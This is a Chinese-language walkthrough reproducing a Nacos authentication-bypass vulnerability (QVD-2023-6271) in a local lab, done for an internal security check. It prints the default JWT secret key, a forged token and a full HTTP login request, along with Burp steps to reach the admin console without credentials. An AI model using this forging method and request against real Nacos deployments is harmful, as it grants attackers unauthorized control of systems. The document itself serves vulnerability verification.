Nacos身份绕过漏洞复现(QVD-2023-6271)
公司上级预警QVD-2023-6271,领导安排进行排查。
本着知己知彼的原则,我在本地将该漏洞复现出来。
漏洞原理:Nacos 在默认配置下未对 token.secret.key 进行修改,导致远程攻击者可以绕过密钥认证进入后台,造成系统受控等后果。
一、环境安装
vwmare 安装 win10环境 (略)
java安装
我这里使用的是jdk-11.0.2_windows-x64_bin.exe。
下载地址:
jdk下载
安装后记得配置环境变量,这里需要注意一下环境变量,因为nacos是使用的JAVA_HOME作为java的环境变量,path里面添加java的路径作为环境变量是无效的。
需要在环境变量里面新建JAVA_HOME,指定jdk的安装位置。
nacos启动
下载地址:
nacos
要下载nacos版本小于2.2.0,版本高于2.2.0的话漏洞就修复了,没法复现了。
我这里使用的是2.2.0版本。
解压后,接入D:\nacos\bin(对应的解压路径)的cmd,输入启动命令
startup.cmd -m standalone
访问登录界面。
二、获取cookie
时间戳准备
我们实现先准备个时间戳,需要大于当前系统时间,我现在时间是2023年4月23日,我构造了2023年4月24日的时间。
时间戳构造网页连接:
时间戳
使用nacos默认key可进行jwt构造
nacos默认key(token.secret.key值的位置在conf下的application.properties)
SecretKey012345678901234567890123456789012345678901234567890123456789
PAYLOAD:DATA
{
"sub": "nacos",
"exp": 1682308800
}
jwt网址:
json web tokens
得到了一串值。
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY4MjMwODgwMH0.VJRpZj-TyDFbPKioQTrrWbQ-HlX_ZhkcuT_RVRniAA4
burp发送数据包
通过构造数据包发送,可以在返回包获取到cookie。
其中用户名和密码都是自己构造的,实际上nacos不存在这个用户。
请求包
POST /nacos/v1/auth/users/login HTTP/1.1
Host: 192.168.30.100:8848
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://192.168.30.100:8848
Connection: close
Referer: http://192.168.30.100:8848/nacos/index.html
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY4MjMwODgwMH0.VJRpZj-TyDFbPKioQTrrWbQ-HlX_ZhkcuT_RVRniAA4
username=najcos&password=nacjos
三、 burpsuite修改数据包
开启代理,打开经典的火狐浏览器
截取登录数据包
将刚才返回包得到的构造的cookie和用户密码填入到数据包里面
右击选择Do intercept–>Response to request
点击Forward,发现这里报500错
没关系,找到之前的构造cookie的返回包
复制全部内容,粘贴到里面,点击Forward!!!
关闭代理,查看浏览器。
成功绕过。